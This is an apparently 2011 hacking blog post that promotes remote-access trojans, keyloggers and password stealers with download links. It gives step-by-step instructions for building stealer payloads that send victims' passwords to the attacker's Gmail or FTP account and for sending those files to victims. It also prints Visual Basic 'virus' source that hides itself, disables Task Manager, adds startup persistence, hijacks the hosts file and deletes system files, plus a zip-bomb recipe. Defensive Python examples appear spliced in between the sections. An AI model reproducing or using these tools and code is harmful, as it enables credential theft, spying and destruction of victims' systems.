Thursday, 17 November 2011

HACK COMPUTER USING CYBERGATE RAT

What is CyberGate:


CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously being developed by our experienced team.

What it can do:

CyberGate was built to be a tool for various possible applications, ranging from assisting users with routine maintenance tasks to remotely monitoring your children; it captures regular user activity and automatically maintains a backup of your typed data. It can also be used as a monitoring device for detecting unauthorized access.
CyberGate achieves this through its abundant array of features, a few of which are illustrated below:

[+] Automatically map ports if your router supports UPnP;

[+] Multi-Threaded : allowing for multiple clients to be connected, along with increased reliability.

[+] Reverse Connection : Some of the listed advantages of a reverse connection –
# Outgoing connections are generally less threatening, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote computer is connecting to the remote administrator, one does not need to know the remote computer’s IP address in order to connect.

# It is much easier to keep track of the computers the RAT is installed on, since they are all “calling home” by connecting to the remote administrator.

[+] User Friendly GUI : The neat and simple GUI of CyberGate makes this tool very easy to use and the simplest way to achieve your goals.

[+] Stealth : The various features of the server installation make the server extremely customizable according to each user’s needs and requirements.

[+] Keylogger : This tool can be used to find out what is happening on your computer while you are away, and to maintain a backup of your typed data.

[+] Password recovery : It can be used to recover some of the passwords that you forgot a long time ago.

[+] Tasks: CyberGate is able to create tasks either for the Client to perform at a specific time after being started, or for an individual remote whenever it connects back to CyberGate.

[+] Connections tab: You can monitor all the connections and client performance from a connection log that registers actions and the time/date of those actions.

Download CyberGate

SPYNET 2.7 RAT – GHOST EDITION

New features included:
- Added optional connection limit.
- Increased connection stability. Spy-Net is now as stable as SS-Rat.
- Increased speed in the file manager when listing files and drives.
- Autostart on most features now.
- Password retrieval has been improved.


Features and Specs:
- server around 280 kb, depending on whether an icon is selected, rootkit, UPX compression, etc.
- Windows XP, Vista and 7 compatible;
- DNS Updater (for now working with No-IP; a DynDNS updater is being developed at the moment)
- File Manager with a load of options like FTP upload, setting file attributes, image preview, etc.;
- Windows List;
- Process List;
- Device List;
- Service List;
- Registry Editor;
- Installed Programs;
- Active Ports List;
- Remote Desktop;
- Webcam capture;
- Audio Capture;
- Password Recovery Tool (with direct download to client or FTP logs);
- Password Grabber;
- Socks 4/5 proxy;
- HTTP Proxy;
- Open Webpage;
- Download and Execute;
- Send local files and run hidden or normally;
- Remote Chat Client;
- DOS Prompt;
- Run cmd;
- Clipboard Grabber;
- Search for remote files and search in Password Recovery Tool;
- Access to download folder, remote desktop screenshots and web capture from menu;
- Encrypted traffic between Client and server;
- a few extra options (restart, lock buttons and so on) and all the options related to the server (uninstall, rename, etc.);
- a new option for injection – wait for the first browser to open (not the default browser but the first to start); seems useful in some cases.
- Rootkit in beta stage and being developed. It will hide the process name and startup keys that have SPY_NET_RAT as name. Tested under XP and working; being developed and tested on other OSes;
- Connections Limit selector;
- Binder;
- Columns selector (you can choose which columns you want to see details from in the client, e.g. you can hide the RAM info view or Ports info view or any other by right-clicking on top of the columns);
- Ability to choose whether or not the server is installed on the remote computer.

NOTICE: you can’t update SpyNet 2.6 to 2.7; it’s not compatible…
Download SpyNet

FUD KEYLOGGER WITH FUD CRYPTERS TO HACK ACCOUNTS

Features of This Keylogger/Stealer:


- Keylogger
- Password Stealer (Opera, Firefox, IE)
- USB virus spreader
- Icon changer
- File binder
- Task Manager kill
- Cookie deleter
- Downloader
- Website blocker
- Autostart with Windows
- Fake error
- Antis
- Assembly changer/Dropper
- New icons
- New stealer regs
- Build bug is being fixed
- Stub bug is being fixed
- FUD
- Cure
- Firewall disabler
- System Restore point disabled
- CMD disabled
- BAT/REG files disabled
- File pumper
- Opera + Chrome stealer
- Application stealer
- Windows (“Windoof”) serial stealer
- PC info stealer


Download Now – Click Here and Get It

DARKCOMET RAT V3.0 – HACK ANY COMPUTER

DarkComet 3.0 List improvement:
By DarkCoderSc

- 09/10/2010 : RC4 traffic encryption done; it encrypts all plain text and data flux with a 256-bit RC4 encryption. All your private data are now totally secured and DarkComet is impossible to flood / exploit.
- 09/10/2010 : Dynamic 256-bit RC4 key added when you choose a password on DarkComet; that means if you want to be secured at 200%, when you choose a password in the server it will bind the actual RC4 key with your password, then without the correct client password the data won’t be correctly decrypted and nothing will work without your password.
- 09/10/2010 : Now the edit-server settings are totally encrypted in 256-bit RC4 too, so it is no longer possible to reverse and read your personal settings; again you are totally secured now.
- 10/10/2010 : New column added in connection list (SIN); now you can see the RAM usage/Total RAM and Free RAM.
- 10/10/2010 : New column added in connection list (SIN); now you can see the country code/country localisation (geo) and the default system language.
- 10/10/2010 : New column added in connection list (SIN); now you can see the first execution date/time of the server. If it has just been executed and not installed, it displays the current date/time.
- 10/10/2010 : Now you can choose whether you want to display the default language flag or the geo IP flag.
- 10/10/2010 : In the OS column the Windows installed drive was added (it’s where Windows was installed).
- 12/10/2010 : Clipboard manager has been recoded; now you can resize the textbox and listview for better comfort.
- 12/10/2010 : Two functions added in Clipboard manager: get the remote clipboard text into your clipboard, and send your clipboard text to the remote clipboard.
- 12/10/2010 : Process Manager now has really better compatibility on 64-bit OS; now it lists all processes.
- 12/10/2010 : Process Manager lists the processes 3x faster.
- 12/10/2010 : If you use a password for protecting the connection, it will be displayed in the tray icon with a locker to remind you!
- 16/10/2010 : New toast style made; now it displays more information and has a better design.
- 16/10/2010 : Clipboard copy problem fixed in password manager; also the whole system is more stable.


Download

HOW TO HIDE A VIRUS INTO ANOTHER FILE

There are many ways one can get a virus but in this case he had picked up some bad files on Limewire (P2P file sharing software). The viruses were wrapped up with legitimate music files. In other words, he downloaded the music file, ran the music file and the music file played as usual. What he didn’t know is that a virus file was hidden within the music file. How does that happen? We will attempt to explain this.
Please note that we are not publishing the code we used to do this so others don’t download and abuse it!
First off we need a binder program…



This program will bind two files together. Now we are going to wrap up our virus file (File1) with our image file (File2). Notice how you can change the file extensions to whatever you want. You can load .exe, .vbs viruses etc… You can also choose that the main file is an image, video or whatever you want.




Once you have decided on what virus you want to hide and in what type of media file you want to use, you tell the code to run the media file normally but HIDE the virus file (usually runs in console window).




Once we have set up the C code to do as we want, we then run the makefile script. This will run our code through Borland’s C compiler and build our program. The finished program is called dropper.exe. You can give this program whatever icon you want. In this example, since we are trying to hide our virus in an image file, we used an image icon.




Keep in mind that this is just one example of how people hide virus files inside other working media files. It is very important to have up-to-date AV (Anti Virus) software, and if you are running a Windows computer, ALWAYS have the computer show you file extensions!
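The advice to always show file extensions is the defender's side of this trick. Here is an added example (not from the original post) of a small Python check that flags files with a media extension hiding an executable extension, or whose first bytes are a PE (MZ) header despite a media name; the magic-number table, extension sets and sample directory are constructed for this example.

```python
"""Spot files disguised as media: double extensions and mismatched magic bytes."""
import os
import tempfile
from typing import Dict, List, Optional

# Leading bytes of a few common formats (constructed table for this example).
MAGIC = {
    "exe": (b"MZ",),                      # DOS/PE executable header
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "mp3": (b"ID3", b"\xff\xfb"),
}
MEDIA_EXTS = {"jpg", "jpeg", "png", "gif", "bmp", "mp3", "wav", "avi", "mp4", "txt", "pdf", "doc"}
# Extensions Windows will execute when double-clicked.
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js"}


def sniff(head: bytes) -> Optional[str]:
    """Guess the real format from the first bytes, or None if unknown."""
    for kind, sigs in MAGIC.items():
        if any(head.startswith(s) for s in sigs):
            return kind
    return None


def classify(name: str, head: bytes) -> List[str]:
    """Return the reasons a file looks disguised; an empty list means nothing odd."""
    parts = name.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    reasons = []
    # 'holiday.jpg.exe' displays as 'holiday.jpg' when Explorer hides known extensions.
    if ext in EXEC_EXTS and len(parts) > 2 and parts[-2] in MEDIA_EXTS:
        reasons.append(f"double extension: shown as .{parts[-2]} but runs as .{ext}")
    kind = sniff(head)
    # A file that claims to be media but starts with an MZ header is an executable.
    if kind == "exe" and ext in MEDIA_EXTS:
        reasons.append(f"PE header (MZ) inside a .{ext} file")
    # A 'media' file whose bytes match a different media format is worth a look too.
    if kind not in (None, "exe") and ext in MEDIA_EXTS and kind != ext.replace("jpeg", "jpg"):
        reasons.append(f"content looks like {kind}, not .{ext}")
    return reasons


def scan_directory(path: str) -> Dict[str, List[str]]:
    """Classify every regular file under `path`, reading only its first 16 bytes."""
    findings = {}
    for root, _dirs, files in os.walk(path):
        for fname in files:
            with open(os.path.join(root, fname), "rb") as fh:
                head = fh.read(16)
            reasons = classify(fname, head)
            if reasons:
                findings[fname] = reasons
    return findings


def demo() -> Dict[str, List[str]]:
    """Build a constructed sample directory and scan it (no real malware involved)."""
    samples = {
        "song.mp3": b"ID3\x03\x00\x00\x00\x00\x00\x00" + b"\x00" * 32,   # honest media file
        "photo.jpg": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 32,      # executable renamed to .jpg
        "holiday.jpg.exe": b"MZ\x90\x00" + b"\x00" * 32,                 # double extension
        "setup.exe": b"MZ\x90\x00" + b"\x00" * 32,                       # honestly named executable
    }
    with tempfile.TemporaryDirectory() as tmp:
        for fname, content in samples.items():
            with open(os.path.join(tmp, fname), "wb") as fh:
                fh.write(content)
        return scan_directory(tmp)


if __name__ == "__main__":
    for fname, reasons in demo().items():
        print(fname, "->", "; ".join(reasons))
```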

KEY 1.0 KEYLOGGERS

Report date: 2011-01-29 14:30:18 (GMT 1)
File name: getthekey-1-0-exe
File size: 53760 bytes
MD5 Hash: fec89753fc76c4b3ac38e78fbfe49a5e
SHA1 Hash: bcff2a897c63922363d3c75ccce9887608dea909
Detection rate: 0 on 16 (0%)
Status: CLEAN


Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
NoVirusThanks.org

File Info

Report date: 2011-01-29 14:29:56 (GMT 1)
File name: stub-exe
File size: 82432 bytes
MD5 Hash: 98b5fd46ebb60f1ebef3ed1bced1f5f8
SHA1 Hash: 722a4d599c277b33154e125dde40d50277b24a01
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared -
Avast -
AVG -
Avira AntiVir - TR/ATRAPS.Gen
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Scan report generated by
NoVirusThanks.org


DOWNLOAD

EMISSARY KEYLOGGER – HACK ANY ACCOUNT

1. You need to download Emissary Keylogger.
2. Open and extract the file to your hard drive; you need WinRAR.


Make sure that you have Microsoft .NET Framework installed in your Windows. You can download it from www.microsoft.com/net/. Otherwise it won’t work…

3. Then open the Emissary exe file; don’t open the stub file.



Enter your Gmail ID and password…
Block AV Sites: Blocks virus-scanning websites on the victim’s computer
Add to Startup: Adds to startup via the Registry
Antis: Anubis, BitDefender, Kaspersky, KeyScrambler, Malwarebytes, NOD32, Norman, OllyDbg, Outpost, Wireshark
Disable TaskManager: Disables Task Manager on the victim’s PC
Disable Regedit: Disables Regedit on the victim’s PC

Check “Trojan Downloader” to download and execute a trojan on the victim’s PC. You can also create a fake error message and scare your victim, like:

After all that, click on build server; the exe server file will be created in the same directory. Send this file to your victim.
That’s it. When he/she runs this file you will receive his/her passwords automatically in your Gmail.

Download Emissary Keylogger

ISTEALER 3.0 – HACK ACCOUNT PASSWORDS

Step 1: First of all go to www.drivehq.com, create a free FTP account and activate it.
Step 2: Download iStealer 3.0

Step 3: Extract the downloaded file to your hard drive with WinRAR or any other compression/extraction tool.
Step 4: Open the iStealer exe file.


Step 5: First, in the Host box write ftp.drivehq.com
and in the login box enter the user name that you created on drivehq.com, as described in step 1.

If you want to bind it with any other software you can bind it; otherwise leave this option blank.

Step 6: Click on Test FTP. If a box opens saying this, your FTP account works properly. See screenshot.



Step 7: Click on build…

Name the file and your file will be created automatically in the same directory.

Step 8: Send this file to your victim via email or any hosting site. When he/she opens this file, his/her passwords will be uploaded to your drivehq FTP account.

HAZE STEALER – HACK EMAIL ACCOUNTS


This is a FREE FUD stealer for all. It steals credentials from most of the important sites and applications, like:


Firefox Stealer
Internet Explorer Stealer
Steam Stealer
Chrome Stealer
Filezilla Stealer
Game Keys
All Windows Keys
No-Ip Stealer




Scans:

File Info

Report date: 2010-10-06 18:41:48 (GMT 1)
File name: haze-stealer-exe
File size: 1782784 bytes
MD5 Hash: 0db9387a3e3261e89cf9eb0129fd749f
SHA1 Hash: 909fc67babf127226cd4ed084a4d6191eb5761b4
Detection rate: 2 on 16 (13%)
Status: INFECTED

Detections

a-squared –
Avast –
AVG –
Avira AntiVir – SPR/PSW.Messen.FY
BitDefender –
ClamAV –
Comodo –
Dr.Web –
F-PROT6 –
Ikarus T3 –
Kaspersky –
NOD32 –
Panda –
TrendMicro –
VBA32 – Trojan-Spy.IEPV
VirusBuster –

Scan report generated by
NoVirusThanks.org

Download

KEYLOGGER STAR TOOLS – HACK ANY EMAIL

Step 1: First you should download the Star Tools keylogger. Click Here for Download


Step 2: Extract the rar file and run Star Tools: after that a box will open; go to Tools and click on Keylogger…

Step 3: Enter your Gmail ID and password and hit Build Keylogger.

After entering email and password, click on Build Keylogger; a server.exe file is created automatically in the same directory.
Step 4: Send this server file to your victim. When he/she runs this file, all his keystrokes will be sent to your Gmail account automatically…

100+ HACKING TOOLS



Hacking Tools in This pack:-


HOTMAIL HACKING
YAHOO HACKING
MSN FUN TOOLS
FAKE SCREENS/PAGES
OTHER HACKING TOOLS

FUN TOOLS Page 1:
MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head **** HotMail Hack
HotMail Hacker XE Edition
HotMail Hack
HotMail Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
MSN SPY Lite
HotMail Hacker Gold
HotMail Hacker Final
Give me Ur Pass
HotMail Brute Forcer
MSN Password Finder
MSN Password Grabber
Hack MSN Password
Hack HotMail Evolution
Magic Password Sender
MSN Locker
HotMail Killer
Hot Freeze
MessenPass
HotMail Hack !
Ice Cold Reload
HotMail Killer 2
Nuke MSN

Page 2:
Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
HotMail Login Screen
Fake Web Pages 2
Fake Web Pages 1
AOL Killer
Fake Login HotMail
B S Spy
Saria Fake Logins

Page 3:
Yahoo Password Retrieval
Yacam
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S H Yahoo Password Sender

Page 4:
NetWork Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute Forcer

Page 5:
Hook Tool Box
Smart Hack Uploader
Remote Anything
Post Sage
PHPbb Attacker

Page 6:
Skinner
MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Kitle
Protect Lithium
Tray It!
MSN Block Checker
MSN Auto Responder
MSN Virus Cleaner

Download and enjoy hacking

Download 100 Hacking Tools

HACK ADMINISTRATOR PASSWORD IN WINDOWS XP, 7 & VISTA

If you have lost your password, don’t worry about it; just follow these steps and log in to your admin account.


You need a blank CD or floppy, internet access, and a CD or floppy writer.

1. Download this small utility.

Click Here To Download

After downloading you will get a zip and an ISO image file; burn it with any burner onto a floppy or CD.

Restart your system and when prompted press Enter to boot from the CD.



Note: If you do not get a prompt to boot from CD, then restart your system and press F2, F6, F8 or Esc (any one of them should work for your system) before Windows starts booting. Now you will enter the BIOS, and you should change the boot order from there with CD-ROM as the first preference. Then restart your system again.

Now the software will load automatically. It will ask you to select the Windows drive and after that provide you with the option of resetting the password.

NOTEPAD HACKING TRICK

This is an exploit of compression algorithms to make a small zip that will extract into extreme amounts. There are more ways and better ones than this one, but I will only show how to make a simple 1k = 1m ratio.
1) Make a.txt file
2) Open it and type the null character (Alt + 255)
3) Press Ctrl + A then Ctrl + V a couple of times to make some null bytes

4) If you have a hex editor, make the hex 00 for about 50 kilobytes.
5) Now make several copies of a.txt and name them accordingly
6) Open cmd.exe
7) Type copy /b *.txt b.txt
8) Now every copy is merged into one super copy; repeat
9) Once you have a nice big empty text file, like 1 GB, put it in a zip archive.
Because of the simple construction of the file, 1 GB of null bytes…!
The zip is only 1 MB in size and can really annoy friends.
For added fun, hex edit the zip and you will see a bunch of hex 5555.
Just add some more and the file will expand amazingly.
Make sure not to open this afterwards.
You can always create your zip of death from the command line in Linux:
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz
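The archive described above can be caught before extraction by reading the zip's central directory, and a careful extractor also counts the bytes it actually inflates, because the declared sizes are written by whoever built the archive. The Python below is an added example, not part of the post; it builds the null-byte zip in memory as its sample input, and the thresholds MAX_RATIO and MAX_TOTAL are assumptions.

```python
"""Check a zip's declared expansion ratio before extracting, then inflate under a hard cap."""
import io
import zipfile
from typing import List, Tuple

MAX_RATIO = 100                    # the post's 1 KB -> 1 MB file is ~1000:1, well past this
MAX_TOTAL = 50 * 1024 * 1024       # refuse archives that claim to expand past 50 MiB


def inspect_zip(data: bytes) -> Tuple[bool, List[str]]:
    """Read only the central directory and report suspicious members; nothing is inflated."""
    findings = []
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            total += info.file_size
            ratio = info.file_size / max(info.compress_size, 1)
            if ratio > MAX_RATIO:
                findings.append(
                    f"{info.filename}: {info.file_size} bytes from {info.compress_size} "
                    f"compressed (ratio {ratio:.0f}:1)")
    if total > MAX_TOTAL:
        findings.append(f"declared total {total} bytes exceeds cap of {MAX_TOTAL}")
    return (not findings, findings)


def read_capped(data: bytes, name: str, cap: int) -> bytes:
    """Inflate one member while counting real output bytes.

    The sizes in the central directory are written by whoever made the archive, so a
    careful extractor never trusts them: it stops as soon as the inflated data passes `cap`.
    """
    out = bytearray()
    with zipfile.ZipFile(io.BytesIO(data)) as zf, zf.open(name) as member:
        while True:
            chunk = member.read(64 * 1024)
            if not chunk:
                break
            out += chunk
            if len(out) > cap:
                raise ValueError(f"{name}: passed {cap} bytes while inflating, aborting")
    return bytes(out)


def build_zip(name: str, payload: bytes) -> bytes:
    """Construct a single-member deflate archive in memory (sample input for this example)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def null_bomb(size: int) -> bytes:
    """The post's trick: a file of nothing but 0x00 bytes, which deflate shrinks ~1000:1."""
    return build_zip("a.txt", b"\x00" * size)


if __name__ == "__main__":
    ok, why = inspect_zip(null_bomb(1 << 20))
    print("safe" if ok else "suspicious:", *why)
```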

HOW TO CREATE A POWERFUL VIRUS IN VISUAL BASIC


Open VB and follow the code:


–code start here–

Private Sub Form_Load()
On Error Resume Next
‘This command will allow the application to continue running
‘even if an error occurs instead of terminating/closing.
Hide
‘This command will hide the application from even being seen on the victims
‘screen even if your program has it’s settings set to Visible|True
App.TaskVisible = False
‘This command is even better, this command will stop your program
‘from showing up in Task Manager-Applications Tab List, but it will still
‘show up in process list, sorry =/
End Sub



‘disable taskmanager

Shell “REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f”, vbHide
Shell “REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ###Name### /t REG_SZ /d ###Drive:\Path\Name.exe### /f”, vbHide
‘This command will make your application start with windows.
Shell “REG add HKCR\exefile\shell\open\command /v Shell /t REG_SZ /d ###Drive:\Path\Name.exe### %1 %* /f”, vbHide
‘This command will make your application start when ever the victim opens another application via msnmsngr.exe as an example
Shell “REG add HKLM\Control Panel\International /v s1159 /t REG_S /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v s2359 /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v SLongDate /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sShortDate /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sTimeFormat /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
Shell “REG add HKLM\Control Panel\International /v sNativeDigits /t REG_SZ /d ###Letter/Symbol/Number### /f”, vbHide
‘These commands will set the time & date for the victims computer permanently
‘Change the ###Letter/Symbol/Number### to ? for example, and the victim will see ???????? for the time and ??????
‘for the date.
FileCopy App.Path & “\” & App.EXEName & “.EXE”, “Drive:\Path\Name.exe”
‘This code well, it couldn’t be more obvious what it does, but when copying your virus/worm ect
‘to a new path, try looking up windows processes like svchost.exe, making it harder for the victim
‘to get rid of your virus/worm/trojan ect.

Dim intResult As Integer
Randomize
intResult = Int((9542 * Rnd) + 4592)
FileCopy App.Path & “\” & App.EXEName & “.EXE”, “c:\Documents and Settings\All Users\Desktop\DimenBlackScript.exe” & intResult & “.exe”
‘Ok for abit of fun, here is a simple code but a real nasty one, add a timer to your application
‘interval set to “1″ when this code runs, all user accounts desktops will be flooded with your virus and the longer it
‘runs the more Memory it takes up and the more viruses that person has to delete, try adding it to places like
‘ C:\DOCU~\All Users\Start Menu\Programs\Start up\
‘That will cause the victim alot of hassle =P.

Kill “c:\windows\win.ini”
Kill “c:\windows\system.ini”
Open “c:\WINDOWS\win.ini” For Output As #1
Print #1, “Load = C:\Program Files\Virus1.exe”
Print #1, “run = C:\Program Files\Virus2.exe”
Close #1
Open “c:\WINDOWS\system.ini” For Output As #1
Print #1, “Shell=Explorer.exe C:\WINDOWS\System\Virus3.exe”
Print #1, “Shell=Explorer.exe C:\WINDOWS\System32\Virus4.exe”
Close #1
‘Ok people more fun, making your application start with windows, without using Registry or DOS
‘one little alter and your viruses and start with windows and the victim will not know how.

Open “c:\WINDOWS\system32\drivers\etc\hosts” For Output As #1
Print #1, “208.65.153.251 208.65.153.251 “
Print #1, “208.65.153.251 www.google.com”
Print #1, “208.65.153.251 www.google.co.uk”
Print #1, “208.65.153.251 www.yahoo.com”
Print #1, “208.65.153.251 www.yahoo.co.uk”
Print #1, “208.65.153.251 www.askjeeves.com”
Print #1, “208.65.153.251 www.altavista.com”
Print #1, “208.65.153.251 www.alltheweb.com”
Print #1, “208.65.153.251 www.msn.com”
Print #1, “208.65.153.251 www.hotmail.com”
Print #1, “208.65.153.251 www.myspace.com”
Print #1, “208.65.153.251 www.plunder.com”
Print #1, “208.65.153.251 www.quicksharing.com”
Print #1, “208.65.153.251 www.myspace.co.uk”
Close #1
‘Just something to help stop the victim from google-ing what the virus has done, and getting information
‘or downloads to help rid them of your infection >=P.

Kill “%SystemRoot%\syst” & “em32\dfrg.msc”
Kill “%SystemRoot%\syste” & “m32\wscui.cpl”
Kill “C:\Program Files\Co” & “mmon Files\Microsoft Shared\MSInfo\msinfo32.exe”
Kill “%SystemRoot%\syste” & “m32\restore\rstrui.exe”
Kill “c:\WINDOWS\syste” & “m32\rundll32.exe”
‘Ok now finally let’s get rid of System Restore, Rundll(by deleting this file, the victim can no longer
‘view the properties window for any file on his or her computer).

–code end here–
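The hosts-file rewrite in the snippet above (search engines and webmail pointed at one address; the Emissary section calls the same trick “Block AV Sites” when the targets are scanner sites) is easy to audit from the defender’s side. The Python below is an added example, not code from the post; WATCHED and HOSTS_SAMPLE are constructed for this example, with the sample modelled on the entries the VB code writes.

```python
"""Audit a hosts file for hijacked or blackholed names and mass redirects to one address."""
import ipaddress
from collections import defaultdict
from typing import List, Tuple

# Names whose override in hosts is never benign on a workstation. Constructed watch list:
# the search/webmail names come from the VB snippet, the vendor names stand in for AV sites.
WATCHED = {
    "www.google.com", "www.yahoo.com", "www.msn.com", "www.hotmail.com",
    "www.kaspersky.com", "www.bitdefender.com",
}
MASS_REDIRECT_MIN = 3   # this many unrelated names on one non-local IP is a sinkhole pattern

HOSTS_SAMPLE = """# constructed sample modelled on the entries written by the VB code
127.0.0.1       localhost
::1             localhost
208.65.153.251  www.google.com
208.65.153.251  www.yahoo.com      # note the mass redirect to one address
208.65.153.251  www.hotmail.com
0.0.0.0         www.kaspersky.com  # blackholed: the 'Block AV Sites' variant
192.168.1.20    fileserver.lan     # harmless local override
"""


def parse_hosts(text: str):
    """Return (line number, ip address object, hostname) for every valid mapping."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()       # drop comments
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                               # not a mapping line
        for name in fields[1:]:
            entries.append((lineno, addr, name.lower()))
    return entries


def audit_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (kind, detail) findings: overrides of watched names and mass redirects."""
    findings = []
    names_by_ip = defaultdict(set)
    for lineno, addr, name in parse_hosts(text):
        local = addr.is_loopback or addr.is_unspecified   # 127.x / ::1 / 0.0.0.0
        if name in WATCHED:
            what = "blackholed" if local else f"redirected to {addr}"
            findings.append(("watched-override", f"line {lineno}: {name} {what}"))
        if not local:
            names_by_ip[addr].add(name)
    for addr, names in names_by_ip.items():
        if len(names) >= MASS_REDIRECT_MIN:
            findings.append(("mass-redirect",
                             f"{len(names)} names point at {addr}: " + ", ".join(sorted(names))))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_hosts(HOSTS_SAMPLE):
        print(f"[{kind}] {detail}")
```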

GET SOMEONE’S IP ADDRESS – 3 BEST METHODS

Obtaining an IP from MSN Messenger.

First we learn the method used by most people when they want to get someone else’s IP address.


Step 1 – Start MSN Messenger and log in as yourself.

Step 2 – Hit your “Start” button and click Run. Type “Command” (without the quotation marks) into the white box.


Step 3 – Type “Netstat -N” (without the quotation marks) into the black box and hit Enter.

Step 4 – Start a conversation with your ‘victim’ and send them a file. Once they accept the file, hit your “Start” button and click Run, type “Command” (without the quotation marks) into the white box, and type “Netstat -N” (without the quotation marks) into the black box and hit Enter.

Step 5 – Look in the middle column of both your MS-DOS boxes and look in the newer window for the IP address that has magically appeared in the middle column. This is your victim’s IP address.


Obtaining an IP from an E-Mail.



OK, let’s say the person does not use MSN Messenger (can’t blame them); we can get an IP address from most e-mails. In this example we shall use Outlook Express to view the e-mails.

Step 1 – Load Outlook Express and left-click on an e-mail that was sent by your ‘victim’.


Step 2 – Right-click this e-mail and click the “Properties” button.

Step 3 – Now click on the tab labelled “Details” and look for the button saying “Message Source”; once found (not hard), click it.

Step 4 – Look in all the jargon for something like “X-Originating-IP: ” with a number after the colon. This number is the sender’s IP address.

Step 5 – If you cannot find “X-Originating-IP: ” then do not worry. Look instead for “Received:”, and go along this string until you come to a number in brackets. This may be an IP, but it might not be the IP address of the ‘victim’; in fact, if they sent the e-mail from a web e-mail service (like hotmail.com) then chances are it is not their IP address.
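Reading the Received chain is standard phishing triage, and the caveat in Step 5 (a webmail hop is the provider’s server, not the sender) is the part people get wrong. The Python below is an added example, not part of the post; SAMPLE_MESSAGE is a constructed message using RFC 5737 documentation addresses.

```python
"""Walk the Received: chain of an e-mail and pull out the hop addresses for triage."""
import email
import re
from typing import Dict, List, Optional

# Constructed sample; addresses are from the RFC 5737 documentation ranges.
SAMPLE_MESSAGE = """\
Received: from mx.example.org (mx.example.org [203.0.113.10])
    by mail.example.net with ESMTP id 7abc123
    for <me@example.net>; Thu, 17 Nov 2011 10:00:05 +0000
Received: from webmail.example.org ([192.0.2.25])
    by mx.example.org with HTTP; Thu, 17 Nov 2011 09:59:58 +0000
X-Originating-IP: [198.51.100.7]
From: Someone <someone@example.org>
To: me@example.net
Subject: hello

body text
"""

IPV4_IN_BRACKETS = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def parse_hops(raw_message: str) -> List[Dict[str, object]]:
    """Return the hops in transit order (origin first).

    Each MTA prepends its own Received: line, so the header at the top of the
    message is the last hop and the bottom one is closest to the sender.
    """
    msg = email.message_from_string(raw_message)
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        flat = " ".join(value.split())                  # unfold continuation lines
        match = IPV4_IN_BRACKETS.search(flat)           # first bracketed IP is the 'from' side
        hops.append({
            "ip": match.group(1) if match else None,
            "webmail": " with http" in flat.lower(),     # submitted through a web interface
            "raw": flat,
        })
    return hops


def originating_ip(raw_message: str) -> Optional[str]:
    """X-Originating-IP as some webmail providers add it, brackets stripped."""
    msg = email.message_from_string(raw_message)
    value = msg.get("X-Originating-IP")
    if value is None:
        return None
    return value.strip().strip("[]")


def summarize(raw_message: str) -> str:
    """One triage line; the first hop is only the sender if it was not a webmail submission."""
    hops = parse_hops(raw_message)
    origin = originating_ip(raw_message)
    if not hops:
        return "no Received headers"
    first = hops[0]
    if first["webmail"]:
        note = f"first hop {first['ip']} is the webmail server, not the sender"
        if origin:
            note += f"; X-Originating-IP gives {origin}"
        return note
    return f"first hop {first['ip']} is the sending host as seen by the first relay"


if __name__ == "__main__":
    for hop in parse_hops(SAMPLE_MESSAGE):
        print(hop["ip"], "(webmail)" if hop["webmail"] else "")
    print(summarize(SAMPLE_MESSAGE))
```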
Obtaining an IP from Physical Access.

If you have physical access to a computer then getting the IP address is simple.


Step 1 – Click the “Start” button and hit “Run”. Type in “Command” and hit enter.

Step 2 – Type in “ipconfig” OR “winipcfg” and hit Enter; now look for where it says “IP Address:”. Next to this is the IP of the computer you are using…

PENTBOX SECURITY SUITE – V1.4

